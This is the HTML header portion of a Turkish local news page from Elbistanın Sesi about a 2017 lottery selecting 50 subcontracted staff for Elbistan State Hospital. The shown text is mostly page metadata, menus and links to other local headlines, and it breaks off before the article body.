<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <title>Hastane güvenlik görevlisi olanların isimleri</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="300 Yataklı Elbistan Devlet Hastanesi&#039;nde ihtiyaç duyulan 50 taşeron personelin belirlenmesi amacıyla kura çekimi yapıldı."> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Hastane güvenlik görevlisi olanların isimleri"> <meta property="og:description" content="300 Yataklı Elbistan Devlet Hastanesi&#039;nde ihtiyaç duyulan 50 taşeron personelin belirlenmesi amacıyla kura çekimi yapıldı."> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/hastane-guvenlik-gorevlisi-olanlarin-isimleri-h38142.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2017/03/hastane_guvenlik_gorevlisi_olanlarin_isimleri_h38142_3660c.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Hastane güvenlik görevlisi olanların isimleri"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/hastane-guvenlik-gorevlisi-olanlarin-isimleri-h38142.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="#"> <meta name="twitter:title" content="Hastane güvenlik görevlisi olanların isimleri"> <meta name="twitter:description" content="300 Yataklı Elbistan Devlet Hastanesi’nde ihtiyaç duyulan 50 taşeron personelin belirlenmesi amacıyla kura çekimi yapıldı."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2017/03/hastane_guvenlik_gorevlisi_olanlarin_isimleri_h38142_3660c.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2017/03/hastane_guvenlik_gorevlisi_olanlarin_isimleri_h38142_3660c.jpg" /> <meta itemprop="headline" content="Hastane güvenlik görevlisi olanların isimleri" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/hastane_guvenlik_gorevlisi_olanlarin_isimleri_h38142_3660c.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2017-03-10T15:55:46+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2017/03/hastane_guvenlik_gorevlisi_olanlarin_isimleri_h38142_3660c.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '9'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = '#'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">3.7562</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">3.9860</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">144.749</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">89671</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/aelye-285-isci-alinacak-a-santrali-de-rehabilite-edilecek-h38082.html" title="AEL’ye 285 işçi alınacak, A Santrali de rehabilite edilecek" >AEL’ye 285 işçi alınacak, A Santrali de rehabilite edilecek</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/egitim-kultur/ustun-zekli-ogrenciler-elbistanda-egitim-gorecek-h37977.html" title="Üstün zekâlı öğrenciler, Elbistan’da eğitim görecek" >Üstün zekâlı öğrenciler, Elbistan’da eğitim görecek</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/muhtarlardan-cami-tarlasi-tepkisi-h37327.html" title="Muhtarlardan ‘cami tarlası’ tepkisi" >Muhtarlardan ‘cami tarlası’ tepkisi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/aelde-7-milyon-500-bin-ton-komur-uretildi-h37249.html" title="AEL’de, 7 milyon 500 bin ton kömür üretildi" >AEL’de, 7 milyon 500 bin ton kömür üretildi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanspor-gol-oldu-yagdi-h37078.html" title="Elbistanspor, gol oldu yağdı" >Elbistanspor, gol oldu yağdı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanli-2-polis-memuru-hain-saldirida-yaralandi-h37068.html" title="Elbistanlı 2 polis memuru hain saldırıda yaralandı" >Elbistanlı 2 polis memuru hain saldırıda yaralandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/4-firinciya-ornek-isyeri-belgesi-takdim-edildi-h37009.html" title="4 fırıncıya ‘Örnek İşyeri’ belgesi takdim edildi" >4 fırıncıya ‘Örnek İşyeri’ belgesi takdim edildi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/hasta-sayisi-35-bin-sebebi-kirlilik-ve-dikkatsizlik-h35965.html" title="Hasta sayısı 35 bin, sebebi: KİRLİLİK VE DİKKATSİZLİK" >Hasta sayısı 35 bin, sebebi: KİRLİLİK VE DİKKATSİZLİK</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/sehit-yarbay-ozer-dualarla-ugurlandi-h35408.html" title="Şehit Yarbay Özer, dualarla uğurlandı" >Şehit Yarbay Özer, dualarla uğurlandı</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="bd81b20cc4e4f9edf748b6cf7ff0ac271636bdb8" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Hastane güvenlik görevlisi olanların isimleri" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="İhale İlanları" href="http://www.elbistaninsesi.com/ihale-ilanlari" id="k15" >İhale İlanları</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/navruz-purcuklu-89-yasinda-h38133.html" title="Navruz Pürçüklü 89 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/navruz_purcuklu_89_yasinda_h38133_abcc5.jpg" alt="Navruz Pürçüklü 89 yaşında" /> Navruz Pürçüklü 89 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/fethiye-yektausaklari-75-yasinda-h38132.html" title="Fethiye Yektauşakları 75 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/fethiye_yektausaklari_75_yasinda_h38132_03ba6.jpg" alt="Fethiye Yektauşakları 75 yaşında" /> Fethiye Yektauşakları 75 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/emine-kurnaz-h38131.html" title="Emine Kurnaz"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/emine_kurnaz_h38131_a179c.jpg" alt="Emine Kurnaz" /> Emine Kurnaz</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-arig-h38130.html" title="Ahmet Arığ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/ahmet_arig_h38130_3dcb9.jpg" alt="Ahmet Arığ" /> Ahmet Arığ</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/hastane-klinik-destek-elemani-olanlarin-isimleri-h38144.html" title="Hastane klinik destek elemanı olanların isimleri"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/hastane_klinik_destek_elemani_olanlarin_isimleri_h38144_c1eca.jpg" alt="Hastane klinik destek elemanı olanların isimleri" /> Hastane klinik destek elemanı olanların isimleri</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/hastane-guvenlik-gorevlisi-olanlarin-isimleri-h38142.html" title="Hastane güvenlik görevlisi olanların isimleri"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/hastane_guvenlik_gorevlisi_olanlarin_isimleri_h38142_3660c.jpg" alt="Hastane güvenlik görevlisi olanların isimleri" /> Hastane güvenlik görevlisi olanların isimleri</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/hastane-bilgi-sistemleri-elemani-olanlarin-isimleri-h38141.html" title="Hastane bilgi sistemleri elemanı olanların isimleri"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/hastane_bilgi_sistemleri_elemani_olanlarin_isimleri_h38141_e8df1.jpg" alt="Hastane bilgi sistemleri elemanı olanların isimleri" /> Hastane bilgi sistemleri elemanı olanların isimleri</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/randevusuz-arac-muayenesi-yapilmayacak-h38140.html" title="Randevusuz araç muayenesi yapılmayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/randevusuz_arac_muayenesi_yapilmayacak_h38140_e81da.JPG" alt="Randevusuz araç muayenesi yapılmayacak" /> Randevusuz araç muayenesi yapılmayacak</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/chpli-vekil-pazar-yeri-yangini-tbmmye-tasidi-h38120.html" title="CHP’li vekil, Pazar yeri yangını TBMM’ye taşıdı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/chpli_vekil_pazar_yeri_yangini_tbmmye_tasidi_h38120_d7a58.jpg" alt="CHP’li vekil, Pazar yeri yangını TBMM’ye taşıdı" /> CHP’li vekil, Pazar yeri yangını TBMM’ye taşıdı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunc-pazar-esnafinin-magduriyeti-giderilmeli-h38119.html" title="Öztunç: “Pazar esnafının mağduriyeti giderilmeli”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/oztunc_pazar_esnafinin_magduriyeti_giderilmeli_h38119_6a3b7.JPG" alt="Öztunç: “Pazar esnafının mağduriyeti giderilmeli”" /> Öztunç: “Pazar esnafının mağduriyeti giderilmeli”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/chp-kadin-kollari-kadinlar-gununu-kutladi-h38117.html" title="CHP Kadın Kolları, Kadınlar Gününü kutladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/chp_kadin_kollari_kadinlar_gununu_kutladi_h38117_1b2f3.JPG" alt="CHP Kadın Kolları, Kadınlar Gününü kutladı" /> CHP Kadın Kolları, Kadınlar Gününü kutladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/soydan-kadinlar-gununde-sahalardayiz-h38112.html" title="Soydan: Kadınlar Günü’nde Sahalardayız"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/soydan_kadinlar_gununde_sahalardayiz_h38112_673a7.jpg" alt="Soydan: Kadınlar Günü’nde Sahalardayız" /> Soydan: Kadınlar Günü’nde Sahalardayız</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/tsmden-bobrekdere-ziyaret-h38135.html" title="TSM’den BÖBREKDER’e ziyaret"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/tsmden_bobrekdere_ziyaret_h38135_4e4cf.JPG" alt="TSM’den BÖBREKDER’e ziyaret" /> TSM’den BÖBREKDER’e ziyaret</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/dis-hastanesinde-mesai-disi-hizmet-h38088.html" title="Diş hastanesinde mesai dışı hizmet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/dis_hastanesinde_mesai_disi_hizmet_h38088_1b5ee.JPG" alt="Diş hastanesinde mesai dışı hizmet" /> Diş hastanesinde mesai dışı hizmet</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/tsmden-gebe-bilgilendirme-egitimi-h38008.html" title="TSM’den, Gebe Bilgilendirme Eğitimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/tsmden_gebe_bilgilendirme_egitimi_h38008_47329.jpg" alt="TSM’den, Gebe Bilgilendirme Eğitimi" /> TSM’den, Gebe Bilgilendirme Eğitimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistana-noroloji-uzmani-atanacak-h37973.html" title="Elbistan’a nöroloji uzmanı atanacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistana_noroloji_uzmani_atanacak_h37973_0bb42.jpg" alt="Elbistan’a nöroloji uzmanı atanacak" /> Elbistan’a nöroloji uzmanı atanacak</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/8-bin-81-aday-ygsde-ter-dokecek-h38143.html" title="8 bin 81 aday YGS’de ter dökecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/8_bin_81_aday_ygsde_ter_dokecek_h38143_21e3f.jpg" alt="8 bin 81 aday YGS’de ter dökecek" /> 8 bin 81 aday YGS’de ter dökecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/istiklal-marsini-en-guzel-onlar-okudu-h38138.html" title="İstiklal Marşı’nı en güzel onlar okudu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/istiklal_marsini_en_guzel_onlar_okudu_h38138_65d13.jpg" alt="İstiklal Marşı’nı en güzel onlar okudu" /> İstiklal Marşı’nı en güzel onlar okudu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kucuk-nisanur-istiklal-marsini-guzel-okuma-yarismasinda-birinci-oldu-h38127.html" title="Küçük Nisanur, İstiklal Marşı’nı güzel okuma yarışmasında birinci oldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/kucuk_nisanur_istiklal_marsini_guzel_okuma_yarismasinda_birinci_oldu_h38127_0ab9c.jpg" alt="Küçük Nisanur, İstiklal Marşı’nı güzel okuma yarışmasında birinci oldu" /> Küçük Nisanur, İstiklal Marşı’nı güzel okuma yarışmasında birinci oldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/ogrencilerden-anlamli-ziyaret-h38111.html" title="Öğrencilerden anlamlı ziyaret"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/ogrencilerden_anlamli_ziyaret_h38111_4df7e.JPG" alt="Öğrencilerden anlamlı ziyaret" /> Öğrencilerden anlamlı ziyaret</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-play-off-maclarina-cikmiyor-h38137.html" title="Elbistanspor, play-off maçlarına çıkmıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/elbistanspor_play_off_maclarina_cikmiyor_h38137_e446b.jpg" alt="Elbistanspor, play-off maçlarına çıkmıyor" /> Elbistanspor, play-off maçlarına çıkmıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanli-boksorler-sampiyon-olarak-donduler-h38078.html" title="Elbistanlı boksörler şampiyon olarak döndüler"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/elbistanli_boksorler_sampiyon_olarak_donduler_h38078_45e57.JPG" alt="Elbistanlı boksörler şampiyon olarak döndüler" /> Elbistanlı boksörler şampiyon olarak döndüler</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanli-boksorler-bolge-sampiyonasina-katiliyor-h38009.html" title="Elbistanlı boksörler bölge şampiyonasına katılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistanli_boksorler_bolge_sampiyonasina_katiliyor_h38009_7a21f.JPG" alt="Elbistanlı boksörler bölge şampiyonasına katılıyor" /> Elbistanlı boksörler bölge şampiyonasına katılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistansporun-bal-umudu-play-off-maclarina-kaldi-h37991.html" title="Elbistanspor’un BAL umudu play-off maçlarına kaldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistansporun_bal_umudu_play_off_maclarina_kaldi_h37991_6e54a.jpg" alt="Elbistanspor’un BAL umudu play-off maçlarına kaldı" /> Elbistanspor’un BAL umudu play-off maçlarına kaldı</a> </div> </div></div><div class="katelement kat_k15"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/tc-elbistan-icra-dairesi-h38101.html" title="T.C. ELBİSTAN İCRA DAİRESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/tc_elbistan_icra_dairesi_h38101_97136.jpg" alt="T.C. ELBİSTAN İCRA DAİRESİ" /> T.C. ELBİSTAN İCRA DAİRESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/tc-elbistan-icra-dairesi-h38100.html" title="T.C. ELBİSTAN İCRA DAİRESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/tc_elbistan_icra_dairesi_h38100_b8d43.jpg" alt="T.C. ELBİSTAN İCRA DAİRESİ" /> T.C. ELBİSTAN İCRA DAİRESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/turkiye-seker-fabrikalari-as-elbistan-seker-fabrikasi-h38099.html" title="TÜRKİYE ŞEKER FABRİKALARI A.Ş. ELBİSTAN ŞEKER FABRİKASI"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/turkiye_seker_fabrikalari_as_elbistan_seker_fabrikasi_h38099_a5c66.jpg" alt="TÜRKİYE ŞEKER FABRİKALARI A.Ş. ELBİSTAN ŞEKER FABRİKASI" /> TÜRKİYE ŞEKER FABRİKALARI A.Ş. ELBİSTAN ŞEKER FABRİKASI</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/ilan-h38068.html" title="İLAN"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/ilan_h38068_09708.jpg" alt="İLAN" /> İLAN</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/nefes-kredisinin-ust-limiti-150-bin-tl-oldu-h38043.html" title="Nefes Kredisinin üst limiti 150 bin TL oldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/nefes_kredisinin_ust_limiti_150_bin_tl_oldu_h38043_fb946.JPG" alt="Nefes Kredisinin üst limiti 150 bin TL oldu" /> Nefes Kredisinin üst limiti 150 bin TL oldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/60-kurusa-ekmek-satisi-tedbiren-durduruldu-h38000.html" title="60 kuruşa ekmek satışı tedbiren durduruldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/60_kurusa_ekmek_satisi_tedbiren_durduruldu_h38000_0e2ec.jpg" alt="60 kuruşa ekmek satışı tedbiren durduruldu" /> 60 kuruşa ekmek satışı tedbiren durduruldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/bulut-ciftcimiz-bu-imkandan-faydalanmali-h37964.html" title="Bulut, “Çiftçimiz bu imkandan faydalanmalı”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/bulut_ciftcimiz_bu_imkandan_faydalanmali_h37964_bc95a.JPG" alt="Bulut, “Çiftçimiz bu imkandan faydalanmalı”" /> Bulut, “Çiftçimiz bu imkandan faydalanmalı”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/albayrak-afsin-elbistan-eski-turkiye-icin-onemliydi-h37960.html" title="Albayrak, “Afşin-Elbistan, eski Türkiye için önemliydi”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/albayrak_afsin_elbistan_eski_turkiye_icin_onemliydi_h37960_cfac0.JPG" alt="Albayrak, “Afşin-Elbistan, eski Türkiye için önemliydi”" /> Albayrak, “Afşin-Elbistan, eski Türkiye için önemliydi”</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div> </div> </div> </div> <div id="flashaber" flash-id="fh38134" > <div class="f-kapsayici"> <div class="f-baslik">Flaş Haber</div> <div class="f-haber"> <a href="http://www.elbistaninsesi.com/guncel/hastaneye-isci-alim-kurasi-basladi-h38134.html" title="Hastaneye işçi alım kurası başladı" target="_blank">Hastaneye işçi alım kurası başladı</a> </div> <span class="glyphicons remove_2 f_kapat"></span> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/spor/elbistanspor-play-off-maclarina-cikmiyor-h38137.html" title="Elbistanspor, play-off maçlarına çıkmıyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/03/Elbistan_spor_1.jpg" alt="Elbistanspor, play-off maçlarına çıkmıyor" class="pull-left" /> <div class="caption-line"><p>Elbistanspor, play-off maçlarına çıkmıyor</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/pinarbasinda-su-seviyesi-yukseliyor-h38122.html" title="Pınarbaşı’nda su seviyesi yükseliyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/03/1_2_3.jpg" alt="Pınarbaşı’nda su seviyesi yükseliyor" class="pull-left" /> <div class="caption-line"><p>Pınarbaşı’nda su seviyesi yükseliyor</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/50-isci-icin-kura-genclik-merkezinde-cekilecek-h38121.html" title="50 işçi için kura, Gençlik Merkezi’nde çekilecek" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/03/iYkur_hastane_1.jpg" alt="50 işçi için kura, Gençlik Merkezi’nde çekilecek" class="pull-left" /> <div class="caption-line"><p>50 işçi için kura, Gençlik...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/pazar-yangininin-ardindan-zarar-tespiti-yapildi-h38106.html" title="Pazar yangınının ardından zarar tespiti yapıldı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/03/1_2_2.jpg" alt="Pazar yangınının ardından zarar tespiti yapıldı" class="pull-left" /> <div class="caption-line"><p>Pazar yangınının ardından zarar tespiti...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/akkoyun-kadinlar-toplumun-temel-taslaridir-h38105.html" title="Akkoyun: “Kadınlar, toplumun temel taşlarıdır”" > <img 